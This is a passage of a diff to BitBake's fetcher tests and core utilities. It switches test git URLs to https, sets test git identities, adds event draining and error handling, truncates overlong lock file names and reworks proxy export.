938 fetcher = bb.fetch.Fetch([url], self.d) 993 fetcher = bb.fetch.Fetch([url], self.d)
939 fetcher.download() 994 fetcher.download()
940 # Previous cwd has been deleted 995 # Previous cwd has been deleted
@@ -949,12 +1004,12 @@ class FetcherNetworkTest(FetcherTest):
949 @skipIfNoNetwork() 1004 @skipIfNoNetwork()
950 def test_git_submodule_update_CLI11(self): 1005 def test_git_submodule_update_CLI11(self):
951 """ Prevent regression on update detection not finding missing submodule, or modules without needed commits """ 1006 """ Prevent regression on update detection not finding missing submodule, or modules without needed commits """
952 url = "gitsm://github.com/CLIUtils/CLI11;protocol=git;rev=cf6a99fa69aaefe477cc52e3ef4a7d2d7fa40714" 1007 url = "gitsm://github.com/CLIUtils/CLI11;protocol=https;rev=cf6a99fa69aaefe477cc52e3ef4a7d2d7fa40714;branch=main"
953 fetcher = bb.fetch.Fetch([url], self.d) 1008 fetcher = bb.fetch.Fetch([url], self.d)
954 fetcher.download() 1009 fetcher.download()
955 1010
956 # CLI11 that pulls in a newer nlohmann-json 1011 # CLI11 that pulls in a newer nlohmann-json
957 url = "gitsm://github.com/CLIUtils/CLI11;protocol=git;rev=49ac989a9527ee9bb496de9ded7b4872c2e0e5ca" 1012 url = "gitsm://github.com/CLIUtils/CLI11;protocol=https;rev=49ac989a9527ee9bb496de9ded7b4872c2e0e5ca;branch=main"
958 fetcher = bb.fetch.Fetch([url], self.d) 1013 fetcher = bb.fetch.Fetch([url], self.d)
959 fetcher.download() 1014 fetcher.download()
960 # Previous cwd has been deleted 1015 # Previous cwd has been deleted
@@ -968,7 +1023,7 @@ class FetcherNetworkTest(FetcherTest):
968 1023
969 @skipIfNoNetwork() 1024 @skipIfNoNetwork()
970 def test_git_submodule_aktualizr(self): 1025 def test_git_submodule_aktualizr(self):
971 url = "gitsm://github.com/advancedtelematic/aktualizr;branch=master;protocol=git;rev=d00d1a04cc2366d1a5f143b84b9f507f8bd32c44" 1026 url = "gitsm://github.com/advancedtelematic/aktualizr;branch=master;protocol=https;rev=d00d1a04cc2366d1a5f143b84b9f507f8bd32c44"
972 fetcher = bb.fetch.Fetch([url], self.d) 1027 fetcher = bb.fetch.Fetch([url], self.d)
973 fetcher.download() 1028 fetcher.download()
974 # Previous cwd has been deleted 1029 # Previous cwd has been deleted
@@ -988,7 +1043,7 @@ class FetcherNetworkTest(FetcherTest):
988 """ Prevent regression on deeply nested submodules not being checked out properly, even though they were fetched. """ 1043 """ Prevent regression on deeply nested submodules not being checked out properly, even though they were fetched. """
989 1044
990 # This repository also has submodules where the module (name), path and url do not align 1045 # This repository also has submodules where the module (name), path and url do not align
991 url = "gitsm://github.com/azure/iotedge.git;protocol=git;rev=d76e0316c6f324345d77c48a83ce836d09392699" 1046 url = "gitsm://github.com/azure/iotedge.git;protocol=https;rev=d76e0316c6f324345d77c48a83ce836d09392699;branch=main"
992 fetcher = bb.fetch.Fetch([url], self.d) 1047 fetcher = bb.fetch.Fetch([url], self.d)
993 fetcher.download() 1048 fetcher.download()
994 # Previous cwd has been deleted 1049 # Previous cwd has been deleted
@@ -1046,7 +1101,7 @@ class SVNTest(FetcherTest):
1046 1101
1047 bb.process.run("svn co %s svnfetch_co" % self.repo_url, cwd=self.tempdir) 1102 bb.process.run("svn co %s svnfetch_co" % self.repo_url, cwd=self.tempdir)
1048 # Github will emulate SVN. Use this to check if we're downloding... 1103 # Github will emulate SVN. Use this to check if we're downloding...
1049 bb.process.run("svn propset svn:externals 'bitbake svn://vcs.pcre.org/pcre2/code' .", 1104 bb.process.run("svn propset svn:externals 'bitbake https://github.com/PhilipHazel/pcre2.git' .",
1050 cwd=os.path.join(self.tempdir, 'svnfetch_co', 'trunk')) 1105 cwd=os.path.join(self.tempdir, 'svnfetch_co', 'trunk'))
1051 bb.process.run("svn commit --non-interactive -m 'Add external'", 1106 bb.process.run("svn commit --non-interactive -m 'Add external'",
1052 cwd=os.path.join(self.tempdir, 'svnfetch_co', 'trunk')) 1107 cwd=os.path.join(self.tempdir, 'svnfetch_co', 'trunk'))
@@ -1164,7 +1219,7 @@ class FetchLatestVersionTest(FetcherTest):
1164 1219
1165 test_git_uris = { 1220 test_git_uris = {
1166 # version pattern "X.Y.Z" 1221 # version pattern "X.Y.Z"
1167 ("mx-1.0", "git://github.com/clutter-project/mx.git;branch=mx-1.4", "9b1db6b8060bd00b121a692f942404a24ae2960f", "") 1222 ("mx-1.0", "git://github.com/clutter-project/mx.git;branch=mx-1.4;protocol=https", "9b1db6b8060bd00b121a692f942404a24ae2960f", "")
1168 : "1.99.4", 1223 : "1.99.4",
1169 # version pattern "vX.Y" 1224 # version pattern "vX.Y"
1170 # mirror of git.infradead.org since network issues interfered with testing 1225 # mirror of git.infradead.org since network issues interfered with testing
@@ -1175,7 +1230,7 @@ class FetchLatestVersionTest(FetcherTest):
1175 ("presentproto", "git://git.yoctoproject.org/bbfetchtests-presentproto", "24f3a56e541b0a9e6c6ee76081f441221a120ef9", "") 1230 ("presentproto", "git://git.yoctoproject.org/bbfetchtests-presentproto", "24f3a56e541b0a9e6c6ee76081f441221a120ef9", "")
1176 : "1.0", 1231 : "1.0",
1177 # version pattern "pkg_name-vX.Y.Z" 1232 # version pattern "pkg_name-vX.Y.Z"
1178 ("dtc", "git://git.qemu.org/dtc.git", "65cc4d2748a2c2e6f27f1cf39e07a5dbabd80ebf", "") 1233 ("dtc", "git://git.yoctoproject.org/bbfetchtests-dtc.git", "65cc4d2748a2c2e6f27f1cf39e07a5dbabd80ebf", "")
1179 : "1.4.0", 1234 : "1.4.0",
1180 # combination version pattern 1235 # combination version pattern
1181 ("sysprof", "git://gitlab.gnome.org/GNOME/sysprof.git;protocol=https", "cd44ee6644c3641507fb53b8a2a69137f2971219", "") 1236 ("sysprof", "git://gitlab.gnome.org/GNOME/sysprof.git;protocol=https", "cd44ee6644c3641507fb53b8a2a69137f2971219", "")
@@ -1187,13 +1242,13 @@ class FetchLatestVersionTest(FetcherTest):
1187 : "20120614", 1242 : "20120614",
1188 # packages with a valid UPSTREAM_CHECK_GITTAGREGEX 1243 # packages with a valid UPSTREAM_CHECK_GITTAGREGEX
1189 # mirror of git://anongit.freedesktop.org/xorg/driver/xf86-video-omap since network issues interfered with testing 1244 # mirror of git://anongit.freedesktop.org/xorg/driver/xf86-video-omap since network issues interfered with testing
1190 ("xf86-video-omap", "git://git.yoctoproject.org/bbfetchtests-xf86-video-omap", "ae0394e687f1a77e966cf72f895da91840dffb8f", "(?P<pver>(\d+\.(\d\.?)*))") 1245 ("xf86-video-omap", "git://git.yoctoproject.org/bbfetchtests-xf86-video-omap", "ae0394e687f1a77e966cf72f895da91840dffb8f", r"(?P<pver>(\d+\.(\d\.?)*))")
1191 : "0.4.3", 1246 : "0.4.3",
1192 ("build-appliance-image", "git://git.yoctoproject.org/poky", "b37dd451a52622d5b570183a81583cc34c2ff555", "(?P<pver>(([0-9][\.|_]?)+[0-9]))") 1247 ("build-appliance-image", "git://git.yoctoproject.org/poky", "b37dd451a52622d5b570183a81583cc34c2ff555", r"(?P<pver>(([0-9][\.|_]?)+[0-9]))")
1193 : "11.0.0", 1248 : "11.0.0",
1194 ("chkconfig-alternatives-native", "git://github.com/kergoth/chkconfig;branch=sysroot", "cd437ecbd8986c894442f8fce1e0061e20f04dee", "chkconfig\-(?P<pver>((\d+[\.\-_]*)+))") 1249 ("chkconfig-alternatives-native", "git://github.com/kergoth/chkconfig;branch=sysroot;protocol=https", "cd437ecbd8986c894442f8fce1e0061e20f04dee", r"chkconfig\-(?P<pver>((\d+[\.\-_]*)+))")
1195 : "1.3.59", 1250 : "1.3.59",
1196 ("remake", "git://github.com/rocky/remake.git", "f05508e521987c8494c92d9c2871aec46307d51d", "(?P<pver>(\d+\.(\d+\.)*\d*(\+dbg\d+(\.\d+)*)*))") 1251 ("remake", "git://github.com/rocky/remake.git;protocol=https", "f05508e521987c8494c92d9c2871aec46307d51d", r"(?P<pver>(\d+\.(\d+\.)*\d*(\+dbg\d+(\.\d+)*)*))")
1197 : "3.82+dbg0.9", 1252 : "3.82+dbg0.9",
1198 } 1253 }
1199 1254
@@ -1233,11 +1288,11 @@ class FetchLatestVersionTest(FetcherTest):
1233 # 1288 #
1234 # http://www.cups.org/software/1.7.2/cups-1.7.2-source.tar.bz2 1289 # http://www.cups.org/software/1.7.2/cups-1.7.2-source.tar.bz2
1235 # https://github.com/apple/cups/releases 1290 # https://github.com/apple/cups/releases
1236 ("cups", "/software/1.7.2/cups-1.7.2-source.tar.bz2", "/apple/cups/releases", "(?P<name>cups\-)(?P<pver>((\d+[\.\-_]*)+))\-source\.tar\.gz") 1291 ("cups", "/software/1.7.2/cups-1.7.2-source.tar.bz2", "/apple/cups/releases", r"(?P<name>cups\-)(?P<pver>((\d+[\.\-_]*)+))\-source\.tar\.gz")
1237 : "2.0.0", 1292 : "2.0.0",
1238 # http://download.oracle.com/berkeley-db/db-5.3.21.tar.gz 1293 # http://download.oracle.com/berkeley-db/db-5.3.21.tar.gz
1239 # http://ftp.debian.org/debian/pool/main/d/db5.3/ 1294 # http://ftp.debian.org/debian/pool/main/d/db5.3/
1240 ("db", "/berkeley-db/db-5.3.21.tar.gz", "/debian/pool/main/d/db5.3/", "(?P<name>db5\.3_)(?P<pver>\d+(\.\d+)+).+\.orig\.tar\.xz") 1295 ("db", "/berkeley-db/db-5.3.21.tar.gz", "/debian/pool/main/d/db5.3/", r"(?P<name>db5\.3_)(?P<pver>\d+(\.\d+)+).+\.orig\.tar\.xz")
1241 : "5.3.10", 1296 : "5.3.10",
1242 } 1297 }
1243 1298
@@ -1283,13 +1338,10 @@ class FetchCheckStatusTest(FetcherTest):
1283 "http://downloads.yoctoproject.org/releases/sato/sato-engine-0.2.tar.gz", 1338 "http://downloads.yoctoproject.org/releases/sato/sato-engine-0.2.tar.gz",
1284 "http://downloads.yoctoproject.org/releases/sato/sato-engine-0.3.tar.gz", 1339 "http://downloads.yoctoproject.org/releases/sato/sato-engine-0.3.tar.gz",
1285 "https://yoctoproject.org/", 1340 "https://yoctoproject.org/",
1286 "https://yoctoproject.org/documentation", 1341 "https://docs.yoctoproject.org/",
1287 "http://downloads.yoctoproject.org/releases/opkg/opkg-0.1.7.tar.gz", 1342 "http://downloads.yoctoproject.org/releases/opkg/opkg-0.1.7.tar.gz",
1288 "http://downloads.yoctoproject.org/releases/opkg/opkg-0.3.0.tar.gz", 1343 "http://downloads.yoctoproject.org/releases/opkg/opkg-0.3.0.tar.gz",
1289 "ftp://sourceware.org/pub/libffi/libffi-1.20.tar.gz", 1344 "ftp://sourceware.org/pub/libffi/libffi-1.20.tar.gz",
1290 "http://ftp.gnu.org/gnu/autoconf/autoconf-2.60.tar.gz",
1291 "https://ftp.gnu.org/gnu/chess/gnuchess-5.08.tar.gz",
1292 "https://ftp.gnu.org/gnu/gmp/gmp-4.0.tar.gz",
1293 # GitHub releases are hosted on Amazon S3, which doesn't support HEAD 1345 # GitHub releases are hosted on Amazon S3, which doesn't support HEAD
1294 "https://github.com/kergoth/tslib/releases/download/1.1/tslib-1.1.tar.xz" 1346 "https://github.com/kergoth/tslib/releases/download/1.1/tslib-1.1.tar.xz"
1295 ] 1347 ]
@@ -1328,6 +1380,8 @@ class GitMakeShallowTest(FetcherTest):
1328 self.gitdir = os.path.join(self.tempdir, 'gitshallow') 1380 self.gitdir = os.path.join(self.tempdir, 'gitshallow')
1329 bb.utils.mkdirhier(self.gitdir) 1381 bb.utils.mkdirhier(self.gitdir)
1330 bb.process.run('git init', cwd=self.gitdir) 1382 bb.process.run('git init', cwd=self.gitdir)
1383 bb.process.run('git config user.email "you@example.com"', cwd=self.gitdir)
1384 bb.process.run('git config user.name "Your Name"', cwd=self.gitdir)
1331 1385
1332 def assertRefs(self, expected_refs): 1386 def assertRefs(self, expected_refs):
1333 actual_refs = self.git(['for-each-ref', '--format=%(refname)']).splitlines() 1387 actual_refs = self.git(['for-each-ref', '--format=%(refname)']).splitlines()
@@ -1451,6 +1505,8 @@ class GitShallowTest(FetcherTest):
1451 1505
1452 bb.utils.mkdirhier(self.srcdir) 1506 bb.utils.mkdirhier(self.srcdir)
1453 self.git('init', cwd=self.srcdir) 1507 self.git('init', cwd=self.srcdir)
1508 self.git('config user.email "you@example.com"', cwd=self.srcdir)
1509 self.git('config user.name "Your Name"', cwd=self.srcdir)
1454 self.d.setVar('WORKDIR', self.tempdir) 1510 self.d.setVar('WORKDIR', self.tempdir)
1455 self.d.setVar('S', self.gitdir) 1511 self.d.setVar('S', self.gitdir)
1456 self.d.delVar('PREMIRRORS') 1512 self.d.delVar('PREMIRRORS')
@@ -1532,6 +1588,7 @@ class GitShallowTest(FetcherTest):
1532 1588
1533 # fetch and unpack, from the shallow tarball 1589 # fetch and unpack, from the shallow tarball
1534 bb.utils.remove(self.gitdir, recurse=True) 1590 bb.utils.remove(self.gitdir, recurse=True)
1591 bb.process.run('chmod u+w -R "%s"' % ud.clonedir)
1535 bb.utils.remove(ud.clonedir, recurse=True) 1592 bb.utils.remove(ud.clonedir, recurse=True)
1536 bb.utils.remove(ud.clonedir.replace('gitsource', 'gitsubmodule'), recurse=True) 1593 bb.utils.remove(ud.clonedir.replace('gitsource', 'gitsubmodule'), recurse=True)
1537 1594
@@ -1684,6 +1741,8 @@ class GitShallowTest(FetcherTest):
1684 smdir = os.path.join(self.tempdir, 'gitsubmodule') 1741 smdir = os.path.join(self.tempdir, 'gitsubmodule')
1685 bb.utils.mkdirhier(smdir) 1742 bb.utils.mkdirhier(smdir)
1686 self.git('init', cwd=smdir) 1743 self.git('init', cwd=smdir)
1744 self.git('config user.email "you@example.com"', cwd=smdir)
1745 self.git('config user.name "Your Name"', cwd=smdir)
1687 # Make this look like it was cloned from a remote... 1746 # Make this look like it was cloned from a remote...
1688 self.git('config --add remote.origin.url "%s"' % smdir, cwd=smdir) 1747 self.git('config --add remote.origin.url "%s"' % smdir, cwd=smdir)
1689 self.git('config --add remote.origin.fetch "+refs/heads/*:refs/remotes/origin/*"', cwd=smdir) 1748 self.git('config --add remote.origin.fetch "+refs/heads/*:refs/remotes/origin/*"', cwd=smdir)
@@ -1691,7 +1750,7 @@ class GitShallowTest(FetcherTest):
1691 self.add_empty_file('bsub', cwd=smdir) 1750 self.add_empty_file('bsub', cwd=smdir)
1692 1751
1693 self.git('submodule init', cwd=self.srcdir) 1752 self.git('submodule init', cwd=self.srcdir)
1694 self.git('submodule add file://%s' % smdir, cwd=self.srcdir) 1753 self.git('-c protocol.file.allow=always submodule add file://%s' % smdir, cwd=self.srcdir)
1695 self.git('submodule update', cwd=self.srcdir) 1754 self.git('submodule update', cwd=self.srcdir)
1696 self.git('commit -m submodule -a', cwd=self.srcdir) 1755 self.git('commit -m submodule -a', cwd=self.srcdir)
1697 1756
@@ -1714,6 +1773,8 @@ class GitShallowTest(FetcherTest):
1714 smdir = os.path.join(self.tempdir, 'gitsubmodule') 1773 smdir = os.path.join(self.tempdir, 'gitsubmodule')
1715 bb.utils.mkdirhier(smdir) 1774 bb.utils.mkdirhier(smdir)
1716 self.git('init', cwd=smdir) 1775 self.git('init', cwd=smdir)
1776 self.git('config user.email "you@example.com"', cwd=smdir)
1777 self.git('config user.name "Your Name"', cwd=smdir)
1717 # Make this look like it was cloned from a remote... 1778 # Make this look like it was cloned from a remote...
1718 self.git('config --add remote.origin.url "%s"' % smdir, cwd=smdir) 1779 self.git('config --add remote.origin.url "%s"' % smdir, cwd=smdir)
1719 self.git('config --add remote.origin.fetch "+refs/heads/*:refs/remotes/origin/*"', cwd=smdir) 1780 self.git('config --add remote.origin.fetch "+refs/heads/*:refs/remotes/origin/*"', cwd=smdir)
@@ -1721,7 +1782,7 @@ class GitShallowTest(FetcherTest):
1721 self.add_empty_file('bsub', cwd=smdir) 1782 self.add_empty_file('bsub', cwd=smdir)
1722 1783
1723 self.git('submodule init', cwd=self.srcdir) 1784 self.git('submodule init', cwd=self.srcdir)
1724 self.git('submodule add file://%s' % smdir, cwd=self.srcdir) 1785 self.git('-c protocol.file.allow=always submodule add file://%s' % smdir, cwd=self.srcdir)
1725 self.git('submodule update', cwd=self.srcdir) 1786 self.git('submodule update', cwd=self.srcdir)
1726 self.git('commit -m submodule -a', cwd=self.srcdir) 1787 self.git('commit -m submodule -a', cwd=self.srcdir)
1727 1788
@@ -1756,8 +1817,8 @@ class GitShallowTest(FetcherTest):
1756 self.git('annex init', cwd=self.srcdir) 1817 self.git('annex init', cwd=self.srcdir)
1757 open(os.path.join(self.srcdir, 'c'), 'w').close() 1818 open(os.path.join(self.srcdir, 'c'), 'w').close()
1758 self.git('annex add c', cwd=self.srcdir) 1819 self.git('annex add c', cwd=self.srcdir)
1759 self.git('commit -m annex-c -a', cwd=self.srcdir) 1820 self.git('commit --author "Foo Bar <foo@bar>" -m annex-c -a', cwd=self.srcdir)
1760 bb.process.run('chmod u+w -R %s' % os.path.join(self.srcdir, '.git', 'annex')) 1821 bb.process.run('chmod u+w -R %s' % self.srcdir)
1761 1822
1762 uri = 'gitannex://%s;protocol=file;subdir=${S}' % self.srcdir 1823 uri = 'gitannex://%s;protocol=file;subdir=${S}' % self.srcdir
1763 fetcher, ud = self.fetch_shallow(uri) 1824 fetcher, ud = self.fetch_shallow(uri)
@@ -1971,7 +2032,7 @@ class GitShallowTest(FetcherTest):
1971 2032
1972 @skipIfNoNetwork() 2033 @skipIfNoNetwork()
1973 def test_bitbake(self): 2034 def test_bitbake(self):
1974 self.git('remote add --mirror=fetch origin git://github.com/openembedded/bitbake', cwd=self.srcdir) 2035 self.git('remote add --mirror=fetch origin https://github.com/openembedded/bitbake', cwd=self.srcdir)
1975 self.git('config core.bare true', cwd=self.srcdir) 2036 self.git('config core.bare true', cwd=self.srcdir)
1976 self.git('fetch', cwd=self.srcdir) 2037 self.git('fetch', cwd=self.srcdir)
1977 2038
@@ -2032,6 +2093,8 @@ class GitLfsTest(FetcherTest):
2032 2093
2033 bb.utils.mkdirhier(self.srcdir) 2094 bb.utils.mkdirhier(self.srcdir)
2034 self.git('init', cwd=self.srcdir) 2095 self.git('init', cwd=self.srcdir)
2096 self.git('config user.email "you@example.com"', cwd=self.srcdir)
2097 self.git('config user.name "Your Name"', cwd=self.srcdir)
2035 with open(os.path.join(self.srcdir, '.gitattributes'), 'wt') as attrs: 2098 with open(os.path.join(self.srcdir, '.gitattributes'), 'wt') as attrs:
2036 attrs.write('*.mp3 filter=lfs -text') 2099 attrs.write('*.mp3 filter=lfs -text')
2037 self.git(['add', '.gitattributes'], cwd=self.srcdir) 2100 self.git(['add', '.gitattributes'], cwd=self.srcdir)
diff --git a/bitbake/lib/bb/tinfoil.py b/bitbake/lib/bb/tinfoil.py
index 8c9b6b8ca5..8bec8cbaf6 100644
--- a/bitbake/lib/bb/tinfoil.py
+++ b/bitbake/lib/bb/tinfoil.py
@@ -53,6 +53,10 @@ class TinfoilDataStoreConnectorVarHistory:
53 def remoteCommand(self, cmd, *args, **kwargs): 53 def remoteCommand(self, cmd, *args, **kwargs):
54 return self.tinfoil.run_command('dataStoreConnectorVarHistCmd', self.dsindex, cmd, args, kwargs) 54 return self.tinfoil.run_command('dataStoreConnectorVarHistCmd', self.dsindex, cmd, args, kwargs)
55 55
56 def emit(self, var, oval, val, o, d):
57 ret = self.tinfoil.run_command('dataStoreConnectorVarHistCmdEmit', self.dsindex, var, oval, val, d.dsindex)
58 o.write(ret)
59
56 def __getattr__(self, name): 60 def __getattr__(self, name):
57 if not hasattr(bb.data_smart.VariableHistory, name): 61 if not hasattr(bb.data_smart.VariableHistory, name):
58 raise AttributeError("VariableHistory has no such method %s" % name) 62 raise AttributeError("VariableHistory has no such method %s" % name)
@@ -448,7 +452,7 @@ class Tinfoil:
448 self.run_actions(config_params) 452 self.run_actions(config_params)
449 self.recipes_parsed = True 453 self.recipes_parsed = True
450 454
451 def run_command(self, command, *params): 455 def run_command(self, command, *params, handle_events=True):
452 """ 456 """
453 Run a command on the server (as implemented in bb.command). 457 Run a command on the server (as implemented in bb.command).
454 Note that there are two types of command - synchronous and 458 Note that there are two types of command - synchronous and
@@ -465,7 +469,16 @@ class Tinfoil:
465 commandline = [command] 469 commandline = [command]
466 if params: 470 if params:
467 commandline.extend(params) 471 commandline.extend(params)
468 result = self.server_connection.connection.runCommand(commandline) 472 try:
473 result = self.server_connection.connection.runCommand(commandline)
474 finally:
475 while handle_events:
476 event = self.wait_event()
477 if not event:
478 break
479 if isinstance(event, logging.LogRecord):
480 if event.taskpid == 0 or event.levelno > logging.INFO:
481 self.logger.handle(event)
469 if result[1]: 482 if result[1]:
470 raise TinfoilCommandFailed(result[1]) 483 raise TinfoilCommandFailed(result[1])
471 return result[0] 484 return result[0]
diff --git a/bitbake/lib/bb/ui/knotty.py b/bitbake/lib/bb/ui/knotty.py
index 87e873d644..d1f74389db 100644
--- a/bitbake/lib/bb/ui/knotty.py
+++ b/bitbake/lib/bb/ui/knotty.py
@@ -227,7 +227,9 @@ class TerminalFilter(object):
227 227
228 def keepAlive(self, t): 228 def keepAlive(self, t):
229 if not self.cuu: 229 if not self.cuu:
230 print("Bitbake still alive (%ds)" % t) 230 print("Bitbake still alive (no events for %ds). Active tasks:" % t)
231 for t in self.helper.running_tasks:
232 print(t)
231 sys.stdout.flush() 233 sys.stdout.flush()
232 234
233 def updateFooter(self): 235 def updateFooter(self):
@@ -380,14 +382,27 @@ _evt_list = [ "bb.runqueue.runQueueExitWait", "bb.event.LogExecTTY", "logging.Lo
380 "bb.event.BuildBase", "bb.build.TaskStarted", "bb.build.TaskSucceeded", "bb.build.TaskFailedSilent", 382 "bb.event.BuildBase", "bb.build.TaskStarted", "bb.build.TaskSucceeded", "bb.build.TaskFailedSilent",
381 "bb.build.TaskProgress", "bb.event.ProcessStarted", "bb.event.ProcessProgress", "bb.event.ProcessFinished"] 383 "bb.build.TaskProgress", "bb.event.ProcessStarted", "bb.event.ProcessProgress", "bb.event.ProcessFinished"]
382 384
385def drain_events_errorhandling(eventHandler):
386 # We don't have logging setup, we do need to show any events we see before exiting
387 event = True
388 logger = bb.msg.logger_create('bitbake', sys.stdout)
389 while event:
390 event = eventHandler.waitEvent(0)
391 if isinstance(event, logging.LogRecord):
392 logger.handle(event)
393
383def main(server, eventHandler, params, tf = TerminalFilter): 394def main(server, eventHandler, params, tf = TerminalFilter):
384 395
385 if not params.observe_only: 396 try:
386 params.updateToServer(server, os.environ.copy()) 397 if not params.observe_only:
398 params.updateToServer(server, os.environ.copy())
387 399
388 includelogs, loglines, consolelogfile, logconfigfile = _log_settings_from_server(server, params.observe_only) 400 includelogs, loglines, consolelogfile, logconfigfile = _log_settings_from_server(server, params.observe_only)
389 401
390 loglevel, _ = bb.msg.constructLogOptions() 402 loglevel, _ = bb.msg.constructLogOptions()
403 except bb.BBHandledException:
404 drain_events_errorhandling(eventHandler)
405 return 1
391 406
392 if params.options.quiet == 0: 407 if params.options.quiet == 0:
393 console_loglevel = loglevel 408 console_loglevel = loglevel
@@ -584,7 +599,8 @@ def main(server, eventHandler, params, tf = TerminalFilter):
584 warnings = 0 599 warnings = 0
585 taskfailures = [] 600 taskfailures = []
586 601
587 printinterval = 5000 602 printintervaldelta = 10 * 60 # 10 minutes
603 printinterval = printintervaldelta
588 lastprint = time.time() 604 lastprint = time.time()
589 605
590 termfilter = tf(main, helper, console_handlers, params.options.quiet) 606 termfilter = tf(main, helper, console_handlers, params.options.quiet)
@@ -594,7 +610,7 @@ def main(server, eventHandler, params, tf = TerminalFilter):
594 try: 610 try:
595 if (lastprint + printinterval) <= time.time(): 611 if (lastprint + printinterval) <= time.time():
596 termfilter.keepAlive(printinterval) 612 termfilter.keepAlive(printinterval)
597 printinterval += 5000 613 printinterval += printintervaldelta
598 event = eventHandler.waitEvent(0) 614 event = eventHandler.waitEvent(0)
599 if event is None: 615 if event is None:
600 if main.shutdown > 1: 616 if main.shutdown > 1:
@@ -625,7 +641,7 @@ def main(server, eventHandler, params, tf = TerminalFilter):
625 641
626 if isinstance(event, logging.LogRecord): 642 if isinstance(event, logging.LogRecord):
627 lastprint = time.time() 643 lastprint = time.time()
628 printinterval = 5000 644 printinterval = printintervaldelta
629 if event.levelno >= bb.msg.BBLogFormatter.ERROR: 645 if event.levelno >= bb.msg.BBLogFormatter.ERROR:
630 errors = errors + 1 646 errors = errors + 1
631 return_value = 1 647 return_value = 1
diff --git a/bitbake/lib/bb/ui/taskexp.py b/bitbake/lib/bb/ui/taskexp.py
index 2b246710ca..c00eaf6638 100644
--- a/bitbake/lib/bb/ui/taskexp.py
+++ b/bitbake/lib/bb/ui/taskexp.py
@@ -8,6 +8,7 @@
8# 8#
9 9
10import sys 10import sys
11import traceback
11 12
12try: 13try:
13 import gi 14 import gi
@@ -196,6 +197,7 @@ def main(server, eventHandler, params):
196 gtkgui.start() 197 gtkgui.start()
197 198
198 try: 199 try:
200 params.updateToServer(server, os.environ.copy())
199 params.updateFromServer(server) 201 params.updateFromServer(server)
200 cmdline = params.parseActions() 202 cmdline = params.parseActions()
201 if not cmdline: 203 if not cmdline:
@@ -218,6 +220,9 @@ def main(server, eventHandler, params):
218 except client.Fault as x: 220 except client.Fault as x:
219 print("XMLRPC Fault getting commandline:\n %s" % x) 221 print("XMLRPC Fault getting commandline:\n %s" % x)
220 return 222 return
223 except Exception as e:
224 print("Exception in startup:\n %s" % traceback.format_exc())
225 return
221 226
222 if gtkthread.quit.isSet(): 227 if gtkthread.quit.isSet():
223 return 228 return
diff --git a/bitbake/lib/bb/utils.py b/bitbake/lib/bb/utils.py
index 5f5767c1da..34fa0b7a67 100644
--- a/bitbake/lib/bb/utils.py
+++ b/bitbake/lib/bb/utils.py
@@ -16,7 +16,8 @@ import bb.msg
16import multiprocessing 16import multiprocessing
17import fcntl 17import fcntl
18import importlib 18import importlib
19from importlib import machinery 19import importlib.machinery
20import importlib.util
20import itertools 21import itertools
21import subprocess 22import subprocess
22import glob 23import glob
@@ -420,12 +421,14 @@ def better_eval(source, locals, extraglobals = None):
420 return eval(source, ctx, locals) 421 return eval(source, ctx, locals)
421 422
422@contextmanager 423@contextmanager
423def fileslocked(files): 424def fileslocked(files, *args, **kwargs):
424 """Context manager for locking and unlocking file locks.""" 425 """Context manager for locking and unlocking file locks."""
425 locks = [] 426 locks = []
426 if files: 427 if files:
427 for lockfile in files: 428 for lockfile in files:
428 locks.append(bb.utils.lockfile(lockfile)) 429 l = bb.utils.lockfile(lockfile, *args, **kwargs)
430 if l is not None:
431 locks.append(l)
429 432
430 try: 433 try:
431 yield 434 yield
@@ -458,9 +461,16 @@ def lockfile(name, shared=False, retry=True, block=False):
458 consider the possibility of sending a signal to the process to break 461 consider the possibility of sending a signal to the process to break
459 out - at which point you want block=True rather than retry=True. 462 out - at which point you want block=True rather than retry=True.
460 """ 463 """
464 basename = os.path.basename(name)
465 if len(basename) > 255:
466 root, ext = os.path.splitext(basename)
467 basename = root[:255 - len(ext)] + ext
468
461 dirname = os.path.dirname(name) 469 dirname = os.path.dirname(name)
462 mkdirhier(dirname) 470 mkdirhier(dirname)
463 471
472 name = os.path.join(dirname, basename)
473
464 if not os.access(dirname, os.W_OK): 474 if not os.access(dirname, os.W_OK):
465 logger.error("Unable to acquire lock '%s', directory is not writable", 475 logger.error("Unable to acquire lock '%s', directory is not writable",
466 name) 476 name)
@@ -494,7 +504,7 @@ def lockfile(name, shared=False, retry=True, block=False):
494 return lf 504 return lf
495 lf.close() 505 lf.close()
496 except OSError as e: 506 except OSError as e:
497 if e.errno == errno.EACCES: 507 if e.errno == errno.EACCES or e.errno == errno.ENAMETOOLONG:
498 logger.error("Unable to acquire lock '%s', %s", 508 logger.error("Unable to acquire lock '%s', %s",
499 e.strerror, name) 509 e.strerror, name)
500 sys.exit(1) 510 sys.exit(1)
@@ -959,6 +969,17 @@ def which(path, item, direction = 0, history = False, executable=False):
959 return "", hist 969 return "", hist
960 return "" 970 return ""
961 971
972@contextmanager
973def umask(new_mask):
974 """
975 Context manager to set the umask to a specific mask, and restore it afterwards.
976 """
977 current_mask = os.umask(new_mask)
978 try:
979 yield
980 finally:
981 os.umask(current_mask)
982
962def to_boolean(string, default=None): 983def to_boolean(string, default=None):
963 if not string: 984 if not string:
964 return default 985 return default
@@ -1560,21 +1581,22 @@ def set_process_name(name):
1560 1581
1561# export common proxies variables from datastore to environment 1582# export common proxies variables from datastore to environment
1562def export_proxies(d): 1583def export_proxies(d):
1563 import os 1584 """ export common proxies variables from datastore to environment """
1564 1585
1565 variables = ['http_proxy', 'HTTP_PROXY', 'https_proxy', 'HTTPS_PROXY', 1586 variables = ['http_proxy', 'HTTP_PROXY', 'https_proxy', 'HTTPS_PROXY',
1566 'ftp_proxy', 'FTP_PROXY', 'no_proxy', 'NO_PROXY', 1587 'ftp_proxy', 'FTP_PROXY', 'no_proxy', 'NO_PROXY',
1567 'GIT_PROXY_COMMAND'] 1588 'GIT_PROXY_COMMAND', 'SSL_CERT_FILE', 'SSL_CERT_DIR']
1568 exported = False 1589 exported = False
1569 1590
1570 for v in variables: 1591 origenv = d.getVar("BB_ORIGENV")
1571 if v in os.environ.keys(): 1592
1593 for name in variables:
1594 value = d.getVar(name)
1595 if not value and origenv:
1596 value = origenv.getVar(name)
1597 if value:
1598 os.environ[name] = value
1572 exported = True 1599 exported = True
1573 else:
1574 v_proxy = d.getVar(v)
1575 if v_proxy is not None:
1576 os.environ[v] = v_proxy
1577 exported = True
1578 1600
1579 return exported 1601 return exported
1580 1602
@@ -1584,7 +1606,9 @@ def load_plugins(logger, plugins, pluginpath):
1584 logger.debug(1, 'Loading plugin %s' % name) 1606 logger.debug(1, 'Loading plugin %s' % name)
